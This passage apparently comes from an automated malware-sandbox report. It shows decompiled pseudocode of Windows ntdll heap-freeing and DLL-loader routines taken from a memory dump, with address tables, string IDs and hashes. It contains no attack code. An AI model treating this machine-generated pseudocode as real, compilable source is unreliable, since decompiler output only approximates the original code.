                                      								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                      									_t301 = _t373;
                                      									break;
                                      								}
                                      								_t299 =  *_t407;
                                      								__eflags = _t299;
                                      								if(_t299 == 0) {
                                      									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                      									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                      									break;
                                      								} else {
                                      									_t407 = _t299;
                                      									continue;
                                      								}
                                      							}
                                      							_t62 =  &(_t414[4]); // -16
                                      							E0199BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                      							goto L36;
                                      						}
                                      					}
                                      					L11:
                                      					_t402 = _t419[6];
                                      					_t25 =  &(_t419[4]); // -16
                                      					_t350 = _t25;
                                      					_t254 =  *_t350;
                                      					_v12 = _t254;
                                      					_v20 = _t402;
                                      					_t255 =  *((intOrPtr*)(_t254 + 4));
                                      					__eflags =  *_t402 - _t255;
                                      					if( *_t402 != _t255) {
                                      						L61:
                                      						_push(_t350);
                                      						_push( *_t402);
                                      						E01A3A80D(_t307, 0xd, _t350, _t255);
                                      						goto L3;
                                      					}
                                      					__eflags =  *_t402 - _t350;
                                      					if( *_t402 != _t350) {
                                      						goto L61;
                                      					}
                                      					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                      					_t404 =  *(_t307 + 0xb4);
                                      					__eflags = _t404;
                                      					if(_t404 == 0) {
                                      						L20:
                                      						_t352 = _v20;
                                      						_t258 = _v12;
                                      						 *_t352 = _t258;
                                      						 *(_t258 + 4) = _t352;
                                      						__eflags = _t419[1] & 0x00000008;
                                      						if((_t419[1] & 0x00000008) != 0) {
                                      							_t259 = E0199A229(_t307, _t419);
                                      							__eflags = _t259;
                                      							if(_t259 != 0) {
                                      								goto L21;
                                      							} else {
                                      								E0199A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                      								goto L3;
                                      							}
                                      						}
                                      						L21:
                                      						_t354 = _t419[1];
                                      						__eflags = _t354 & 0x00000004;
                                      						if((_t354 & 0x00000004) != 0) {
                                      							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                      							__eflags = _t354 & 0x00000002;
                                      							if((_t354 & 0x00000002) != 0) {
                                      								__eflags = _t415 - 4;
                                      								if(_t415 > 4) {
                                      									_t415 = _t415 - 4;
                                      									__eflags = _t415;
                                      								}
                                      							}
                                      							_t91 =  &(_t419[8]); // -8
                                      							_t262 = E019CD540(_t91, _t415, 0xfeeefeee);
                                      							_v20 = _t262;
                                      							__eflags = _t262 - _t415;
                                      							if(_t262 != _t415) {
                                      								_t357 =  *[fs:0x30];
                                      								__eflags =  *(_t357 + 0xc);
                                      								if( *(_t357 + 0xc) == 0) {
                                      									_push("HEAP: ");
                                      									E0197B150();
                                      								} else {
                                      									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      								}
                                      								_push(_v20 + 0x10 + _t419);
                                      								E0197B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                      								_t271 =  *[fs:0x30];
                                      								_t421 = _t421 + 0xc;
                                      								__eflags =  *((char*)(_t271 + 2));
                                      								if( *((char*)(_t271 + 2)) != 0) {
                                      									 *0x1a66378 = 1;
                                      									asm("int3");
                                      									 *0x1a66378 = 0;
                                      								}
                                      							}
                                      						}
                                      						_t381 = _a4;
                                      						_t414 = _t419;
                                      						_t419[1] = 0;
                                      						_t419[3] = 0;
                                      						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                      						 *_t419 =  *_t381;
                                      						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                      						L4:
                                      						_t420 = _t414 +  *_t381 * 8;
                                      						if( *(_t307 + 0x4c) == 0) {
                                      							L6:
                                      							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                      								__eflags =  *(_t307 + 0x4c);
                                      								if( *(_t307 + 0x4c) != 0) {
                                      									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                      									 *_t420 = _t390;
                                      									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                      									__eflags = _t390 >> 0x18 - _t328;
                                      									if(__eflags != 0) {
                                      										_push(_t328);
                                      										E01A2FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                      									}
                                      								}
                                      								__eflags = _v5;
                                      								if(_v5 == 0) {
                                      									L94:
                                      									_t382 = _t420[3];
                                      									_t137 =  &(_t420[2]); // -16
                                      									_t309 = _t137;
                                      									_t186 =  *_t309;
                                      									_v20 = _t186;
                                      									_v16 = _t382;
                                      									_t187 =  *((intOrPtr*)(_t186 + 4));
                                      									__eflags =  *_t382 - _t187;
                                      									if( *_t382 != _t187) {
                                      										L63:
                                      										_push(_t309);
                                      										_push( *_t382);
                                      										_push(_t187);
                                      										_push(_t309);
                                      										_push(0xd);
                                      										L64:
                                      										E01A3A80D(_t307);
                                      										continue;
                                      									}
                                      									__eflags =  *_t382 - _t309;
                                      									if( *_t382 != _t309) {
                                      										goto L63;
                                      									}
                                      									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                      									_t393 =  *(_t307 + 0xb4);
                                      									__eflags = _t393;
                                      									if(_t393 == 0) {
                                      										L104:
                                      										_t330 = _v16;
                                      										_t190 = _v20;
                                      										 *_t330 = _t190;
                                      										 *(_t190 + 4) = _t330;
                                      										__eflags = _t420[0] & 0x00000008;
                                      										if((_t420[0] & 0x00000008) == 0) {
                                      											L107:
                                      											_t331 = _t420[0];
                                      											__eflags = _t331 & 0x00000004;
                                      											if((_t331 & 0x00000004) != 0) {
                                      												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                      												_v12 = _t196;
                                      												__eflags = _t331 & 0x00000002;
                                      												if((_t331 & 0x00000002) != 0) {
                                      													__eflags = _t196 - 4;
                                      													if(_t196 > 4) {
                                      														_t196 = _t196 - 4;
                                      														__eflags = _t196;
                                      														_v12 = _t196;
                                      													}
                                      												}
                                      												_t162 =  &(_t420[4]); // -8
                                      												_t197 = E019CD540(_t162, _t196, 0xfeeefeee);
                                      												_v20 = _t197;
                                      												__eflags = _t197 - _v12;
                                      												if(_t197 != _v12) {
                                      													_t335 =  *[fs:0x30];
                                      													__eflags =  *(_t335 + 0xc);
                                      													if( *(_t335 + 0xc) == 0) {
                                      														_push("HEAP: ");
                                      														E0197B150();
                                      													} else {
                                      														E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      													}
                                      													_push(_v20 + 0x10 + _t420);
                                      													E0197B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                      													_t203 =  *[fs:0x30];
                                      													__eflags =  *((char*)(_t203 + 2));
                                      													if( *((char*)(_t203 + 2)) != 0) {
                                      														 *0x1a66378 = 1;
                                      														asm("int3");
                                      														 *0x1a66378 = 0;
                                      													}
                                      												}
                                      											}
                                      											_t394 = _a4;
                                      											_t414[1] = 0;
                                      											_t414[3] = 0;
                                      											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                      											 *_t414 =  *_t394;
                                      											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                      											break;
                                      										}
                                      										_t207 = E0199A229(_t307, _t420);
                                      										__eflags = _t207;
                                      										if(_t207 != 0) {
                                      											goto L107;
                                      										}
                                      										E0199A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                      										continue;
                                      									}
                                      									_t342 =  *_t420 & 0x0000ffff;
                                      									while(1) {
                                      										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                      										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                      											break;
                                      										}
                                      										_t210 =  *_t393;
                                      										__eflags = _t210;
                                      										if(_t210 == 0) {
                                      											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                      											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                      											L103:
                                      											_t146 =  &(_t420[2]); // -16
                                      											E0199BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                      											goto L104;
                                      										}
                                      										_t393 = _t210;
                                      									}
                                      									_t212 = _t342;
                                      									goto L103;
                                      								} else {
                                      									_t384 = _t414[6];
                                      									_t102 =  &(_t414[4]); // -16
                                      									_t311 = _t102;
                                      									_t215 =  *_t311;
                                      									_v20 = _t215;
                                      									_v16 = _t384;
                                      									_t216 =  *((intOrPtr*)(_t215 + 4));
                                      									__eflags =  *_t384 - _t216;
                                      									if( *_t384 != _t216) {
                                      										L92:
                                      										_push(_t311);
                                      										_push( *_t384);
                                      										E01A3A80D(_t307, 0xd, _t311, _t216);
                                      										L93:
                                      										_v5 = 0;
                                      										goto L94;
                                      									}
                                      									__eflags =  *_t384 - _t311;
                                      									if( *_t384 != _t311) {
                                      										goto L92;
                                      									}
                                      									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                      									_t386 =  *(_t307 + 0xb4);
                                      									__eflags = _t386;
                                      									if(_t386 == 0) {
                                      										L79:
                                      										_t313 = _v16;
                                      										_t219 = _v20;
                                      										 *_t313 = _t219;
                                      										 *(_t219 + 4) = _t313;
                                      										__eflags = _t414[1] & 0x00000008;
                                      										if((_t414[1] & 0x00000008) == 0) {
                                      											L82:
                                      											_t314 = _t414[1];
                                      											__eflags = _t314 & 0x00000004;
                                      											if((_t314 & 0x00000004) != 0) {
                                      												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                      												_v12 = _t221;
                                      												__eflags = _t314 & 0x00000002;
                                      												if((_t314 & 0x00000002) != 0) {
                                      													__eflags = _t221 - 4;
                                      													if(_t221 > 4) {
                                      														_t221 = _t221 - 4;
                                      														__eflags = _t221;
                                      														_v12 = _t221;
                                      													}
                                      												}
                                      												_t127 =  &(_t414[8]); // -8
                                      												_t222 = E019CD540(_t127, _t221, 0xfeeefeee);
                                      												_v20 = _t222;
                                      												__eflags = _t222 - _v12;
                                      												if(_t222 != _v12) {
                                      													_t316 =  *[fs:0x30];
                                      													__eflags =  *(_t316 + 0xc);
                                      													if( *(_t316 + 0xc) == 0) {
                                      														_push("HEAP: ");
                                      														E0197B150();
                                      													} else {
                                      														E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      													}
                                      													_push(_v20 + 0x10 + _t414);
                                      													E0197B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                      													_t228 =  *[fs:0x30];
                                      													_t421 = _t421 + 0xc;
                                      													__eflags =  *((char*)(_t228 + 2));
                                      													if( *((char*)(_t228 + 2)) != 0) {
                                      														 *0x1a66378 = 1;
                                      														asm("int3");
                                      														 *0x1a66378 = 0;
                                      													}
                                      												}
                                      											}
                                      											goto L93;
                                      										}
                                      										_t232 = E0199A229(_t307, _t414);
                                      										__eflags = _t232;
                                      										if(_t232 != 0) {
                                      											goto L82;
                                      										}
                                      										E0199A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                      										goto L93;
                                      									}
                                      									_t323 =  *_t414 & 0x0000ffff;
                                      									while(1) {
                                      										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                      										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                      											break;
                                      										}
                                      										_t235 =  *_t386;
                                      										__eflags = _t235;
                                      										if(_t235 == 0) {
                                      											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                      											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                      											L78:
                                      											_t111 =  &(_t414[4]); // -16
                                      											E0199BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                      											goto L79;
                                      										}
                                      										_t386 = _t235;
                                      									}
                                      									_t237 = _t323;
                                      									goto L78;
                                      								}
                                      							}
                                      							return _t414;
                                      						}
                                      						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                      						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                      						if(_t398 >> 0x18 != _t347) {
                                      							_push(_t347);
                                      							_push(0);
                                      							_push(0);
                                      							_push(_t420);
                                      							_push(3);
                                      							goto L64;
                                      						}
                                      						goto L6;
                                      					} else {
                                      						_t277 =  *_t419 & 0x0000ffff;
                                      						_v16 = _t277;
                                      						while(1) {
                                      							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                      							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                      								break;
                                      							}
                                      							_t279 =  *_t404;
                                      							__eflags = _t279;
                                      							if(_t279 == 0) {
                                      								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                      								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                      								break;
                                      							} else {
                                      								_t404 = _t279;
                                      								_t277 =  *_t419 & 0x0000ffff;
                                      								continue;
                                      							}
                                      						}
                                      						E0199BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                      						goto L20;
                                      					}
                                      				}
                                      			}

                                      0x019e1674
                                      0x00000000
                                      0x019e1674
                                      0x01999a95
                                      0x01999a97
                                      0x00000000
                                      0x00000000
                                      0x01999aa0
                                      0x01999aa3
                                      0x01999aa9
                                      0x01999aab
                                      0x01999ad7
                                      0x01999ad7
                                      0x01999ada
                                      0x01999add
                                      0x01999adf
                                      0x01999ae2
                                      0x01999ae6
                                      0x01999b22
                                      0x01999b27
                                      0x01999b29
                                      0x00000000
                                      0x01999b2b
                                      0x019e15be
                                      0x00000000
                                      0x019e15be
                                      0x01999b29
                                      0x01999ae8
                                      0x01999ae8
                                      0x01999aeb
                                      0x01999aee
                                      0x019e15cb
                                      0x019e15d2
                                      0x019e15d5
                                      0x019e15d7
                                      0x019e15da
                                      0x019e15dc
                                      0x019e15dc
                                      0x019e15dc
                                      0x019e15da
                                      0x019e15e5
                                      0x019e15e9
                                      0x019e15ee
                                      0x019e15f1
                                      0x019e15f3
                                      0x019e15f9
                                      0x019e1600
                                      0x019e1604
                                      0x019e1624
                                      0x019e1629
                                      0x019e1606
                                      0x019e161c
                                      0x019e1621
                                      0x019e1637
                                      0x019e163e
                                      0x019e1643
                                      0x019e1649
                                      0x019e164c
                                      0x019e1650
                                      0x019e1656
                                      0x019e165d
                                      0x019e165e
                                      0x019e165e
                                      0x019e1650
                                      0x019e15f3
                                      0x01999af4
                                      0x01999af7
                                      0x01999afc
                                      0x01999b00
                                      0x01999b04
                                      0x01999b08
                                      0x01999b14
                                      0x019999fe
                                      0x01999a04
                                      0x01999a07
                                      0x00000000
                                      0x01999a29
                                      0x019e169c
                                      0x019e16a0
                                      0x019e16a5
                                      0x019e16a9
                                      0x019e16b5
                                      0x019e16ba
                                      0x019e16bc
                                      0x019e16be
                                      0x019e16c3
                                      0x019e16c3
                                      0x019e16bc
                                      0x019e16c8
                                      0x019e16cc
                                      0x019e181b
                                      0x019e181b
                                      0x019e181e
                                      0x019e181e
                                      0x019e1821
                                      0x019e1823
                                      0x019e1826
                                      0x019e1829
                                      0x019e182c
                                      0x019e182e
                                      0x019e1688
                                      0x019e1688
                                      0x019e1689
                                      0x019e168b
                                      0x019e168c
                                      0x019e168d
                                      0x019e168f
                                      0x019e1692
                                      0x00000000
                                      0x019e1692
                                      0x019e1834
                                      0x019e1836
                                      0x00000000
                                      0x00000000
                                      0x019e183f
                                      0x019e1842
                                      0x019e1848
                                      0x019e184a
                                      0x019e1875
                                      0x019e1875
                                      0x019e1878
                                      0x019e187b
                                      0x019e187d
                                      0x019e1880
                                      0x019e1884
                                      0x019e18a7
                                      0x019e18a7
                                      0x019e18aa
                                      0x019e18ad
                                      0x019e18b6
                                      0x019e18bd
                                      0x019e18c0
                                      0x019e18c3
                                      0x019e18c5
                                      0x019e18c8
                                      0x019e18ca
                                      0x019e18ca
                                      0x019e18cd
                                      0x019e18cd
                                      0x019e18c8
                                      0x019e18d5
                                      0x019e18da
                                      0x019e18df
                                      0x019e18e2
                                      0x019e18e5
                                      0x019e18e7
                                      0x019e18ee
                                      0x019e18f2
                                      0x019e1912
                                      0x019e1917
                                      0x019e18f4
                                      0x019e190a
                                      0x019e190f
                                      0x019e1925
                                      0x019e192c
                                      0x019e1931
                                      0x019e193a
                                      0x019e193e
                                      0x019e1940
                                      0x019e1947
                                      0x019e1948
                                      0x019e1948
                                      0x019e193e
                                      0x019e18e5
                                      0x019e194f
                                      0x019e1952
                                      0x019e1956
                                      0x019e195d
                                      0x019e1961
                                      0x019e196d
                                      0x00000000
                                      0x019e196d
                                      0x019e188a
                                      0x019e188f
                                      0x019e1891
                                      0x00000000
                                      0x00000000
                                      0x019e189d
                                      0x00000000
                                      0x019e189d
                                      0x019e184c
                                      0x019e1859
                                      0x019e1859
                                      0x019e185c
                                      0x00000000
                                      0x00000000
                                      0x019e1851
                                      0x019e1853
                                      0x019e1855
                                      0x019e1865
                                      0x019e1865
                                      0x019e1866
                                      0x019e1868
                                      0x019e1870
                                      0x00000000
                                      0x019e1870
                                      0x019e1857
                                      0x019e1857
                                      0x019e185e
                                      0x00000000
                                      0x019e16d2
                                      0x019e16d2
                                      0x019e16d5
                                      0x019e16d5
                                      0x019e16d8
                                      0x019e16da
                                      0x019e16dd
                                      0x019e16e0
                                      0x019e16e3
                                      0x019e16e5
                                      0x019e1808
                                      0x019e1808
                                      0x019e1809
                                      0x019e1812
                                      0x019e1817
                                      0x019e1817
                                      0x00000000
                                      0x019e1817
                                      0x019e16eb
                                      0x019e16ed
                                      0x00000000
                                      0x00000000
                                      0x019e16f6
                                      0x019e16f9
                                      0x019e16ff
                                      0x019e1701
                                      0x019e172c
                                      0x019e172c
                                      0x019e172f
                                      0x019e1732
                                      0x019e1734
                                      0x019e1737
                                      0x019e173b
                                      0x019e175e
                                      0x019e175e
                                      0x019e1761
                                      0x019e1764
                                      0x019e176d
                                      0x019e1774
                                      0x019e1777
                                      0x019e177a
                                      0x019e177c
                                      0x019e177f
                                      0x019e1781
                                      0x019e1781
                                      0x019e1784
                                      0x019e1784
                                      0x019e177f
                                      0x019e178c
                                      0x019e1791
                                      0x019e1796
                                      0x019e1799
                                      0x019e179c
                                      0x019e179e
                                      0x019e17a5
                                      0x019e17a9
                                      0x019e17c9
                                      0x019e17ce
                                      0x019e17ab
                                      0x019e17c1
                                      0x019e17c6
                                      0x019e17dc
                                      0x019e17e3
                                      0x019e17e8
                                      0x019e17ee
                                      0x019e17f1
                                      0x019e17f5
                                      0x019e17f7
                                      0x019e17fe
                                      0x019e17ff
                                      0x019e17ff
                                      0x019e17f5
                                      0x019e179c
                                      0x00000000
                                      0x019e1764
                                      0x019e1741
                                      0x019e1746
                                      0x019e1748
                                      0x00000000
                                      0x00000000
                                      0x019e1754
                                      0x00000000
                                      0x019e1754
                                      0x019e1703
                                      0x019e1710
                                      0x019e1710
                                      0x019e1713
                                      0x00000000
                                      0x00000000
                                      0x019e1708
                                      0x019e170a
                                      0x019e170c
                                      0x019e171c
                                      0x019e171c
                                      0x019e171d
                                      0x019e171f
                                      0x019e1727
                                      0x00000000
                                      0x019e1727
                                      0x019e170e
                                      0x019e170e
                                      0x019e1715
                                      0x00000000
                                      0x019e1715
                                      0x019e16cc
                                      0x01999a45
                                      0x01999a45
                                      0x01999a0e
                                      0x01999a1c
                                      0x01999a23
                                      0x019e167e
                                      0x019e167f
                                      0x019e1681
                                      0x019e1683
                                      0x019e1684
                                      0x00000000
                                      0x019e1684
                                      0x00000000
                                      0x01999aad
                                      0x01999aad
                                      0x01999ab0
                                      0x01999ab3
                                      0x01999ab3
                                      0x01999ab6
                                      0x00000000
                                      0x00000000
                                      0x01999ab8
                                      0x01999aba
                                      0x01999abc
                                      0x01999ac8
                                      0x01999ac8
                                      0x00000000
                                      0x01999abe
                                      0x01999abe
                                      0x01999ac0
                                      0x00000000
                                      0x01999ac0
                                      0x01999abc
                                      0x01999ad2
                                      0x00000000
                                      0x01999ad2
                                      0x01999aab

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                      • API String ID: 0-3178619729
                                      • Opcode ID: 2bcdae3a99f1d636b584a72bf3e3979f1981a7580c7edb9fb73014a878ad1051
                                      • Instruction ID: 62532e4e88939e0f9e66c1b3f0f55766f59cb49feab03d5106caea6acf38bbeb
                                      • Opcode Fuzzy Hash: 2bcdae3a99f1d636b584a72bf3e3979f1981a7580c7edb9fb73014a878ad1051
                                      • Instruction Fuzzy Hash: D122C0706002469FEB26CF2DC489B7ABBF9EF45705F18856DE84A8B342E775D881CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 83%
                                      			E01988794(void* __ecx) {
                                      				signed int _v0;
                                      				char _v8;
                                      				signed int _v12;
                                      				void* _v16;
                                      				signed int _v20;
                                      				intOrPtr _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				signed int _v40;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				intOrPtr* _t77;
                                      				signed int _t80;
                                      				signed char _t81;
                                      				signed int _t87;
                                      				signed int _t91;
                                      				void* _t92;
                                      				void* _t94;
                                      				signed int _t95;
                                      				signed int _t103;
                                      				signed int _t105;
                                      				signed int _t110;
                                      				signed int _t118;
                                      				intOrPtr* _t121;
                                      				intOrPtr _t122;
                                      				signed int _t125;
                                      				signed int _t129;
                                      				signed int _t131;
                                      				signed int _t134;
                                      				signed int _t136;
                                      				signed int _t143;
                                      				signed int* _t147;
                                      				signed int _t151;
                                      				void* _t153;
                                      				signed int* _t157;
                                      				signed int _t159;
                                      				signed int _t161;
                                      				signed int _t166;
                                      				signed int _t168;
                                      
                                      				_push(__ecx);
                                      				_t153 = __ecx;
                                      				_t159 = 0;
                                      				_t121 = __ecx + 0x3c;
                                      				if( *_t121 == 0) {
                                      					L2:
                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                      							L6:
                                      							if(E0198934A() != 0) {
                                      								_t159 = E019FA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                      								__eflags = _t159;
                                      								if(_t159 < 0) {
                                      									_t81 =  *0x1a65780; // 0x0
                                      									__eflags = _t81 & 0x00000003;
                                      									if((_t81 & 0x00000003) != 0) {
                                      										_push(_t159);
                                      										E019F5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                      										_t81 =  *0x1a65780; // 0x0
                                      									}
                                      									__eflags = _t81 & 0x00000010;
                                      									if((_t81 & 0x00000010) != 0) {
                                      										asm("int3");
                                      									}
                                      								}
                                      							}
                                      						} else {
                                      							_t159 = E0198849B(0, _t122, _t153, _t159, _t180);
                                      							if(_t159 >= 0) {
                                      								goto L6;
                                      							}
                                      						}
                                      						_t80 = _t159;
                                      						goto L8;
                                      					} else {
                                      						_t125 = 0x13;
                                      						asm("int 0x29");
                                      						_push(0);
                                      						_push(_t159);
                                      						_t161 = _t125;
                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                      						_t143 = 0;
                                      						_v40 = _t161;
                                      						_t118 = 0;
                                      						_push(_t153);
                                      						__eflags = _t87;
                                      						if(_t87 != 0) {
                                      							_t118 = _t87 + 0x5d8;
                                      							__eflags = _t118;
                                      							if(_t118 == 0) {
                                      								L46:
                                      								_t118 = 0;
                                      							} else {
                                      								__eflags =  *(_t118 + 0x30);
                                      								if( *(_t118 + 0x30) == 0) {
                                      									goto L46;
                                      								}
                                      							}
                                      						}
                                      						_v32 = 0;
                                      						_v28 = 0;
                                      						_v16 = 0;
                                      						_v20 = 0;
                                      						_v12 = 0;
                                      						__eflags = _t118;
                                      						if(_t118 != 0) {
                                      							__eflags = _t161;
                                      							if(_t161 != 0) {
                                      								__eflags =  *(_t118 + 8);
                                      								if( *(_t118 + 8) == 0) {
                                      									L22:
                                      									_t143 = 1;
                                      									__eflags = 1;
                                      								} else {
                                      									_t19 = _t118 + 0x40; // 0x40
                                      									_t156 = _t19;
                                      									E01988999(_t19,  &_v16);
                                      									__eflags = _v0;
                                      									if(_v0 != 0) {
                                      										__eflags = _v0 - 1;
                                      										if(_v0 != 1) {
                                      											goto L22;
                                      										} else {
                                      											_t128 =  *(_t161 + 0x64);
                                      											__eflags =  *(_t161 + 0x64);
                                      											if( *(_t161 + 0x64) == 0) {
                                      												goto L22;
                                      											} else {
                                      												E01988999(_t128,  &_v12);
                                      												_t147 = _v12;
                                      												_t91 = 0;
                                      												__eflags = 0;
                                      												_t129 =  *_t147;
                                      												while(1) {
                                      													__eflags =  *((intOrPtr*)(0x1a65c60 + _t91 * 8)) - _t129;
                                      													if( *((intOrPtr*)(0x1a65c60 + _t91 * 8)) == _t129) {
                                      														break;
                                      													}
                                      													_t91 = _t91 + 1;
                                      													__eflags = _t91 - 5;
                                      													if(_t91 < 5) {
                                      														continue;
                                      													} else {
                                      														_t131 = 0;
                                      														__eflags = 0;
                                      													}
                                      													L37:
                                      													__eflags = _t131;
                                      													if(_t131 != 0) {
                                      														goto L22;
                                      													} else {
                                      														__eflags = _v16 - _t147;
                                      														if(_v16 != _t147) {
                                      															goto L22;
                                      														} else {
                                      															E01992280(_t92, 0x1a686cc);
                                      															_t94 = E01A49DFB( &_v20);
                                      															__eflags = _t94 - 1;
                                      															if(_t94 != 1) {
                                      															}
                                      															asm("movsd");
                                      															asm("movsd");
                                      															asm("movsd");
                                      															asm("movsd");
                                      															 *_t118 =  *_t118 + 1;
                                      															asm("adc dword [ebx+0x4], 0x0");
                                      															_t95 = E019A61A0( &_v32);
                                      															__eflags = _t95;
                                      															if(_t95 != 0) {
                                      																__eflags = _v32 | _v28;
                                      																if((_v32 | _v28) != 0) {
                                      																	_t71 = _t118 + 0x40; // 0x3f
                                      																	_t134 = _t71;
                                      																	goto L55;
                                      																}
                                      															}
                                      															goto L30;
                                      														}
                                      													}
                                      													goto L56;
                                      												}
                                      												_t92 = 0x1a65c64 + _t91 * 8;
                                      												asm("lock xadd [eax], ecx");
                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                      												goto L37;
                                      											}
                                      										}
                                      										goto L56;
                                      									} else {
                                      										_t143 = E01988A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                      										__eflags = _t143;
                                      										if(_t143 != 0) {
                                      											_t157 = _v12;
                                      											_t103 = 0;
                                      											__eflags = 0;
                                      											_t136 =  &(_t157[1]);
                                      											 *(_t161 + 0x64) = _t136;
                                      											_t151 =  *_t157;
                                      											_v20 = _t136;
                                      											while(1) {
                                      												__eflags =  *((intOrPtr*)(0x1a65c60 + _t103 * 8)) - _t151;
                                      												if( *((intOrPtr*)(0x1a65c60 + _t103 * 8)) == _t151) {
                                      													break;
                                      												}
                                      												_t103 = _t103 + 1;
                                      												__eflags = _t103 - 5;
                                      												if(_t103 < 5) {
                                      													continue;
                                      												}
                                      												L21:
                                      												_t105 = E019BF380(_t136, 0x1951184, 0x10);
                                      												__eflags = _t105;
                                      												if(_t105 != 0) {
                                      													__eflags =  *_t157 -  *_v16;
                                      													if( *_t157 >=  *_v16) {
                                      														goto L22;
                                      													} else {
                                      														asm("cdq");
                                      														_t166 = _t157[5] & 0x0000ffff;
                                      														_t108 = _t157[5] & 0x0000ffff;
                                      														asm("cdq");
                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                      														if(__eflags > 0) {
                                      															L29:
                                      															E01992280(_t108, 0x1a686cc);
                                      															 *_t118 =  *_t118 + 1;
                                      															_t42 = _t118 + 0x40; // 0x3f
                                      															_t156 = _t42;
                                      															asm("adc dword [ebx+0x4], 0x0");
                                      															asm("movsd");
                                      															asm("movsd");
                                      															asm("movsd");
                                      															asm("movsd");
                                      															_t110 = E019A61A0( &_v32);
                                      															__eflags = _t110;
                                      															if(_t110 != 0) {
                                      																__eflags = _v32 | _v28;
                                      																if((_v32 | _v28) != 0) {
                                      																	_t134 = _v20;
                                      																	L55:
                                      																	E01A49D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                      																}
                                      															}
                                      															L30:
                                      															 *_t118 =  *_t118 + 1;
                                      															asm("adc dword [ebx+0x4], 0x0");
                                      															E0198FFB0(_t118, _t156, 0x1a686cc);
                                      															goto L22;
                                      														} else {
                                      															if(__eflags < 0) {
                                      																goto L22;
                                      															} else {
                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                      																	goto L22;
                                      																} else {
                                      																	goto L29;
